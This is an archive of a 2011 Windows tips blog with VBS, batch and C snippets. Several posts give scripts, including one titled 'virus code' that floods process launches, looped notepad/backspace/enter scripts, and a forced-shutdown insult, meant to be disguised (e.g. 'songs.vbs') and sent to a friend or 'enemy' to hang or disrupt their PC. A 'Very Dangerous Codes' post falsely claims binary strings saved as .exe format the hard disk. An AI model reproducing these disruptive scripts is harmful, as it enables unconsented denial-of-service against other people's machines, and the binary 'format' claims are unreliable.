Showing posts with label Pc Tricks. Show all posts
Showing posts with label Pc Tricks. Show all posts

05 October 2011

Are you want to know whether your computer is MALE or FEMALE??


  • Just open your notepad in the computer
  • Type this 
{CreateObject("SAPI.SpVoice").Speak"for best tricks visit trickyleaks by musthafa"}

  • Without Any curly braces
  • Save that notepad file as somename.vbs 
  • Thats All!!!
  • If your computer speaks in male voice the it is MALE computer if female then it is FEMALE computer

Be Brilliant Always!!!

26 June 2011

Lock/Hide Ur Folder In Ur Computer Without Using Software | Pc tips & Tricks

    
    Now i am going to publish a very easy trick to lock the folder in the computer without using any software's.
Below i have given full detail about how to lock it! I didn't see any best trick ever than this..
The  main advantage of this trick is after locking the folder, nobody can able to delete this folder, the folder will show its properties as 0bytes and Empty folder
Lets move on to the trick...

  • You can take any folder from your computer to lock it.
  • For this trick i am going to take a "Videos" folder(shown below) which is in location of Drive:I



  • Now i am in the place of  videos (I): drive where the Videos folder is present.



  • Now open Command Prompt in your computer
  • If you do no where is command prompt in your computer
  • Go to Start => Run now type cmd in the run search bar and press Enter
  • If you using Windows7 means Go to Start in the search field type cmd and press Enter
  • Now the Command Prompt window will opens
  • It will show the default drive at where you have installed your OS, mine is in C: Drive so it is showing C:\Users\Mubashira>
  • Now just type the drive name at where the folder which you want to lock is present.
  • Mine is present in I:\Videos so type I: and press Enter
  • Now it will move into that drive I:\> (Shown below)



  • Now just type cacls Videos /E /P everyone:n
  • Here the Videos is my folder name
  • So instead of that Videos folder you have to type the folder name which you want to lock
  • (For e.g) cacls yourfoldername /E /P everyone:n(Shown Below)
  • Now your folder has been locked in your computer



  • The biggest advantage of this trick is, check the properties of that folder
  • As i said you before it will show only 0 bytes in the folder it will show in properties(Shown below)


  • And if you try to click the folder means, it will say something like this(shown below)



  • If you click continue means again a window will open and say like this
  • So no one can able to access this folder




  • It will show the folder is Empty (shown below)


  • And you cannot able to delete this folder also, if you delete it means it will say something like this(shown below)




  •  If you want open the lock folder again means(Videos)
  • Instead of everyone:n put everyone:f in the code
  • That is cacls Videos /E /P everyone:f
  • For (e.g) cacls yourfoldername /E /P everyone:f(shown below)


  • Now you can able to see that folder will show all files(it will be back to its original)(shown below)


  • Now you can able to access the folder as like a before(shown below)
  • Enjoy locking It!!! 



Be Brilliant Always!!!


25 June 2011

Compose Your Own Airtel Tune Using Your C Program | C Program Tips & Tricks



   C program is the one of the basic program which is well known by all computer students. Here is the code to compose your own airtel tune using C program

  • Just open your C program software
  • Just copy and paste the below code exactly in that software
  • Otherwise type this code exactly in your C software
  • Save that C file with anyfilename.C
  • That's it!!!
  • Compile it and here your own compose.


/* compile n execute the code */
#include< stdio.h >
#include< dos.h >
int main(void)
{
printf("Airtel song --- from http://tricksdustbin.blogspot.com/");
float A,Bb,D,G,F;
A = 440;
G = 780;
Bb = 461;
D = 586;
F = 687;
sound(G);
delay(500);
nosound();
sound(G);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(G);
delay(500);
nosound();
sound(2*D);
delay(500);
nosound();
sound(2*A);
delay(250);
nosound();
sound(2*Bb);
delay(250);
nosound();
sound(2*A);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(F);
delay(500);
nosound();
sound(2*A);
delay(500);
nosound();
sound(G);
delay(250);
nosound();
sound(2*A);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(F);
delay(250);
sound(G);
delay(250);
sound(2*A);
delay(250);
sound(2*Bb);
delay(500);
sound(2*A);
delay(500);
sound(G);
delay(250);
sound(F);
delay(250);
sound(D);
delay(500);
nosound();
//end 1
sound(G);
delay(500);
nosound();
sound(G);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(G);
delay(500);
nosound();
sound(2*D);
delay(500);
nosound();
sound(2*A);
delay(250);
nosound();
sound(2*Bb);
delay(250);
nosound();
sound(2*A);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(F);
delay(500);
nosound();
sound(2*A);
delay(500);
nosound();
sound(G);
delay(250);
nosound();
sound(2*A);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(F);
delay(250);
sound(G);
delay(250);
sound(2*A);
delay(250);
sound(2*Bb);
delay(500);
sound(2*A);
delay(500);
sound(G);
delay(250);
sound(F);
delay(250);
sound(D);
delay(500);
nosound();
//end 2
sound(2*A);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(F);
delay(250);
sound(G);
delay(250);
sound(2*A);
delay(250);
sound(2*Bb);
delay(500);
sound(2*A);
delay(500);
sound(G);
delay(250);
sound(F);
delay(250);
sound(D);
delay(500);
nosound();
sound(2*A);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(F);
delay(250);
sound(G);
delay(250);
sound(2*A);
delay(250);
sound(2*Bb);
delay(500);
sound(2*A);
delay(500);
sound(G);
delay(250);
sound(F);
delay(250);
sound(D);
delay(500);
nosound();
return 0;
}

Be Brilliant Always!!! 

23 June 2011

Make The Notepad As Your Personal Dairy | Notepad Tricks

You can able to make the notepad as your own dairy..., Its very simple and easy..

Just go to the notepad
Type .LOG (in capital letters) (shown below)


If you want to write something, type some text or otherwise don't want.
Save that notepad file with... anyfilename..
If you open that notepad file again means, you can able to see at what time that file has been saved...(shown below)
So you can use this trick as your dairy, as it is automatically updating date.


Be Brilliant Always!!!

21 June 2011

Make Your Computer To Speak Using This .VBS Code





Do you want to make your computer to speak the text which your typing. Here is the code...


  • Just go to notepad
  • Copy this below code exactly and paste it in notepad

Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

  • Save that notepad file as anyfilename.vbs(e.g. Speak.vbs)
  • While saving the file just put (Save As Type: All Files) (Shown in image)




  • After saving, if you double click this file means
  • It will ask to type some text
  • Type some text in that bar
  • Now your computer will speak out that text



Be Brilliant Always!!!

Hang Your Friend/Enemy Computer Using This Virus Code


If you want to make your Enemies computer to hang. Its very easy and this is very dangerous virus code.
Here is the trick...

  • Just go to notepad
  • Copy and paste this below code exactly in your notepad
Option ExplicitDim WSHShellSet WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim xFor x = 1 to 100000000WSHShell.Run "Tourstart.exe"Next
  • And now save it as anyfilename.vbs (eg: songs.vbs)
  • That's All
  • Now send this file to your friend/enemy using mail or something else..
  • If your friend/enemy double click this file in his/her means it will affect the computer


Note-: Dont try this at your computer its very dangerous... Try at your own risk...It will works only on Windows XP

Be Brilliant Always!!!

18 June 2011

Shake to Minimize All The Nonworking Windows In Windows7, In A SINGLE CLICK..

      So many Windows7 tips & tricks has been going on revealing. In earlier stage of windows we have to minimize the windows one by one only. But in Windows7 it is very easy to minimize all the windows by SINGLE CLICK(except window you are working), its really interesting tip.

  • If you having so many windows open and you are working only in single window and you have to minimize all other un-working windows means
  • Just LEFT CLICK on the TITLE BAR on which window you are  working on.
  • Just shake your working window back and forth.
  • Now you can able to see all other windows will be minimized



  • If you want to open the minimized windows again
  • Just shake your working window back and forth by holding the TITLE BAR, As u did for minimizing.
  • Now all the minimized windows will be opened.




  • You can also use WINDOWS BUTTON+HOME BUTTON combination to minimize and maximize windows 


Be Brilliant Always!!!

16 June 2011

Tip to Show, Both "Title of the Folder" And "Icons" In The Taskbar In Windows7

If you are using windows7 means you will be confused of the icons on the Task Bar that on which file/folder you working and which and all file/folder has been minimized. So on that situation if you use text and icons means it will be easy for you to identify the file/folder
  • Here is the tip to enable that text on Task Bar
  • Just RIGHT CLICK on the empty space on the Task Bar
  • And click PROPERTIES





  • Now the TASKBAR AND STARTMENU PROPERTIES window will open
  • On that window you can able to see something like  Taskbar buttons(as shown in below)




  • At right side of the Taskbar buttons you can able to see a drop down contains: Always combine,hide labels, Combine when taskbar is full, Never combine



  • Click on NEVER COMBINE option
  • Now click APPLY AND OK button to apply it in Task Bar



  • Now you can able to see your Task Bar contains title of that folder/file(Shown below)





14 June 2011

Trick to Fetch the Hidden Themes of Windows7 Left The Old Bored Themes

   Are you bored of old themes in windows7, just fetch the new hidden themes in windows7 and decorate your screen with new hidden themes

  • Just go to the drive on where you have installed Windows7
  • I have installed it in Local Disk(C:)
  • Just Browse through the folder (Your Win7 Drive)\Windows\Globalization\



  • Actually the hidden themes will be there inside the folder name MCT
  • But you cant able to see the folder MCT in Windows\Globalization\
  • So you have to type MCT in address bar after Globalization\



  • Now you can able to see some folders inside that MCT folder(as shown in below image)
  • These all folders are the the Hidden theme folders
  • Click any one of the folder to get that hidden theme



  • Inside that hidden theme folder you can able to see an folder name THEME
  • Click that THEME folder



  • Now the installation file of that theme will be there(Shown Below)
  • Click that installation file



  • Now that particular theme will be installed and will be appear on your Personalize settings(Shown Below)



  • Like wise you can install all other themes also, which is present in that MCT Folder
  • Install all the themes
  • Apply the themes and enjoy!!




Be Brilliant Always!!!

25 May 2011

Do You Want To Make A Shut Down Timer For Your Computer

If you keep time means it will automatically shutdown your computer on that particular time
  • Just follow this process 
  • In your desktop, right click in the mouse and choose "new => shortcut" 
  • There will be one box like "type the location of the 'shortcut' or 'item' " 

    • Type this "shutdown -s -t 3600" without quotes on that box 
    • And click next

    17 May 2011

    Irritate Your Friend By Opening The Notepad Continually In His/her Computer

    • Here is the code 
    • Just go to notepad 
    • Then copy and paste the below code exactly... Without the quotes 
    • Then save the notepad file with "anyfilename.vbs" (without quotes) 
    • And give to your friends 
    • If your friends click this file means it will continually open the notepad 
    • Then enjoy!!!
    (Note: if you want to stop this file means, just do the below steps)


    • Press ctrl+alt+delete button 
    • Task manager window will open 
    • On that press process tab 
    • Then search for the file something like this (wscript.exe) 
    • Then click that file and press "end process" 
    • Thats all

    Don't say the trick how to stop this file to your friends, let them restart the computer, it is not the virus it will not affect any pc



    "
    @ECHO off
    :top
    START %SystemRoot%\system32\notepad.exe
    GOTO top
    "
    (Note: Copy this code which is in between two quotes)

    Be Brilliant Always!!!

    Make Your Friend Irritate By Hitting Backspace Simultaneously In His/Her Computer


    • Here is the code
    • Just go to notepad
    • Then copy and paste the below code exactly... Without the quotes
    • Then save the notepad file with "anyfilename.vbs" (without quotes)
    • And give to your friends
    • If your friends click this file means it will hit backspace simultaneously in his/her pc 
    • Then enjoy!!!
    (Note: if you want to stop this file means, just do the below steps)
    • Press ctrl+alt+delete button
    • Task manager window will open
    • On that press process tab
    • Then search for the file something like this (wscript.exe)
    • Then click that file and press "end process"
    • Thats all
    Don't say the trick how to stop this file to your friends, let them restart the computer, it is not the virus it will not affect any pc


    "
    MsgBox "Let's go back a few steps"
    Set wshShell =wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "{bs}"
    loop
    "
    (Note: Copy this code which is in between two quotes)

    Be Brilliant Always!!!

    16 May 2011

    Freak Your Friends By This Script It Will Open Notepad & It Will Type Slowly "Hello, virus is affected your PC good bye !!!


    • Here is the code
    • Just go to notepad
    • Then copy and paste the below code exactly... Without the quotes
    • Then save the notepad file with "anyfilename.vbs" (without quotes)
    • And give to your friends
    • If your friends click this file means it will automatically open notepad and it will slowly type "hello, how are you? I am good thanks"
    • You can also change the words if you see the below script means you can understand... 
    • Then enjoy!!!
    (Note: if you want to stop this file means, just do the below steps)
    • Press ctrl+alt+delete button
    • Task manager window will open
    • On that press process tab
    • Then search for the file something like this (wscript.exe)
    • Then click that file and press "end process"
    • Thats all
    Don't say the trick how to stop this file to your friends, let them restart the computer, it is not the virus it will not affect any pc


    "
    WScript.Sleep 180000
    WScript.Sleep 10000
    Set WshShell = WScript.CreateObject("WScript.Shell")
    WshShell.Run "notepad"
    WScript.Sleep 100
    WshShell.AppActivate "Notepad"
    WScript.Sleep 500
    WshShell.SendKeys "Hel"
    WScript.Sleep 500
    WshShell.SendKeys "lo "
    WScript.Sleep 500
    WshShell.SendKeys ", vi"
    WScript.Sleep 500
    WshShell.SendKeys "rus "
    WScript.Sleep 500
    WshShell.SendKeys "is affe"
    WScript.Sleep 500
    WshShell.SendKeys "cted "
    WScript.Sleep 500
    WshShell.SendKeys "your "
    WScript.Sleep 500
    WshShell.SendKeys "PC "
    WScript.Sleep 500
    WshShell.SendKeys "go"
    WScript.Sleep 500
    WshShell.SendKeys "od "
    WScript.Sleep 500
    WshShell.SendKeys "by"
    WScript.Sleep 500
    WshShell.SendKeys "e "
    WScript.Sleep 500
    WshShell.SendKeys "!!! "
    "


    (Note: Copy this code which is in between two quotes)

    Be Brilliant Always!!!

    Irritate Your Friend By Making Hit Enter Button Simultaneously


    • Here is the code
    • Just go to notepad
    • Then copy and paste the below code exactly... Without the quotes
    • Then save the notepad file with "anyfilename.vbs" (without quotes)
    • And give to your friends
    • If your friends click this file means the enter button will hit simultaneously
    • Then enjoy!!!
    (Note: If you want to stop this file means, just do the below steps)
    • press ctrl+alt+delete button
    • Task manager window will open
    • On that press process tab
    • Then search for the file something like this (wscript.exe)
    • Then click that file and press "end process"
    • Thats all
    (Note: But in this vbs file we cant able to stop by task manager as it is hitting enter simultaneously so only way to stop is restart pc. But you can try above steps also)




    Don't say the trick how to stop this file to your friends, let them restart the computer, it is not the virus it will not affect any pc


    "
    Set wshShell = wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "~(enter)"
    loop
    "

    (Note: Copy this code which is in between two quotes)

    Be Brilliant Always!!!

    Convey A "lil" Message In Your Friends Computer And Shut Down His / Her Computer

    • Here is the code 
    • Just go to notepad 
    • Then copy and paste the below code exactly... Without the quotes 
    • Then save the notepad file with "anyfilename.vbs" (without quotes) 
    • And give to your friends 
    • If your friends click this file means he/she will get lil message and pc will shut down 
    • Then enjoy!!!

    (Note: if you want to stop this file means, just do the below steps)



    • press ctrl+alt+delete button 
    • Task manager window will open 
    • On that press process tab 
    • Then search for the file something like this (wscript.exe) 
    • Then click that file and press "end process" 
    • Thats all
    Don't say the trick how to stop this file to your friends, let them restart the computer, it is not the virus it will not affect any pc


    "
    @echo off
    msg * I don't like you
    shutdown -c "Error! You are too stupid!" -s
    "
    (Note: Copy this code which is in between two quotes)

    Be Brilliant Always!!!

    15 May 2011

    Whether You Want Toggle Your Friend's Caps Lock Button Simultaneously

    • Here is the code. 
    • Just go to notepad. 
    • Then copy and paste the below code exactly... Without the quotes. 
    • Then save the notepad file with "anyfilename.vbs" (without quotes). 
    • And give to your friends. 
    • If your friends click that file the caps lock button will toggle simultaneously 
    • then enjoy!!!
    (Note: if you want to stop this file means, just do the below steps)


    • Press ctrl+alt+delete button. 
    • Task manager window will open. 
    • On that press process tab. 
    • Then search for the file something like this (wscript.exe). 
    • Then click that file and press "end process". 
    • Thats all 


     Don't say the trick how to stop this file to your friends, let them restart the computer, it is not the virus it will not affect any pc
    So Enjoy....




    Pop Out Your Friends CD Drive Continually...

    If your friends have more than one drive, it will pop all drives continuously...


    • Here is the code
    • Just go to notepad
    • Then copy and paste the below code exactly... Without the quotes
    • Then save the notepad file with "anyfilename.vbs" (without quotes)
    • And give to your friends
    • If your friends click that file cd drive will pop out continuously
    • Then enjoy!!! 
    (Note: if you want to stop this file means, just do the below steps)


    • Press ctrl+alt+delete button
    • Task manager window will open
    • On that press process tab
    • Then search for the file something like this (wscript.exe)
    • Then click that file and press "end process"
    • Thats all
    Don't say the trick how to stop this file to your friends, let them restart the computer, it is not the virus it will not affect any pc

    14 May 2011

    Very Dangerous Codes For Your Computer

    1) write this all codes in the notepad file and save the file as 'anyfilename.exe' 
    01001011000111110010010101010101010000011111100000


    When you open this above code, it will format hard disk!!


    (Note: Checked by me in windows xp, but it is not working in win 7)


    _____________________________________________________


    2) If you are unable to format c drive when the pc is running, then use the following line of code to format it:


    011001100110111101110010011011010110000101110100001000000110001100111010010111000010000000101111010100010010111101011000


    (Note: This i didnt check yet, but it will work i think so...)


    It's extremely cool!
    Be Brilliant Always!!!

    Draw Gradient Using Ms Paint

    We all use ms paint in windows, it is one of the most common feature in windows. Many of us will says that ms paint is waste. But that’s not true
    You can able to make gradient using ms paint!! Its interesting na!!

    Lets see how to do..
    • Go to ms paint 
    • Open a new blank picture having 100 x 100px.

      Add Your Name In Right Click Menu And Open An Application On Clicking It.


      1. Click win+r
      2. Run command window will open
      3. Type "regedit"(without quotes) in that run command box
      4. Navigate to hkey_classes_root\desktop background\shell
      5. After going there some folder will be there like display, gadgets...
      6. Now right click and create a new key with name (your name)
      7. Now in the right side right click over that default value and set value data with (your name)
      8. Again now right click and create a new key name "icon" and set the path(value data) to your icon                 (Note: This 8th step is not compulsory if u want, u can set it) 
      9. Now again right click and create a one more string value with name "position" and set the value data to "top"
      10. Now create another new key name "command" below the (your name) key
      11. Now in the right side column set the default value to the application you want to open, when you click your name.(you can just write the application name) 
      (note: THIS WORKING ONLY IN NEWER VERSIONS WINDOWS LIKE XP, WIN7, VISTA...)
      Be Brilliant Always!!!

      Twitter Delicious Facebook Digg Stumbleupon Favorites More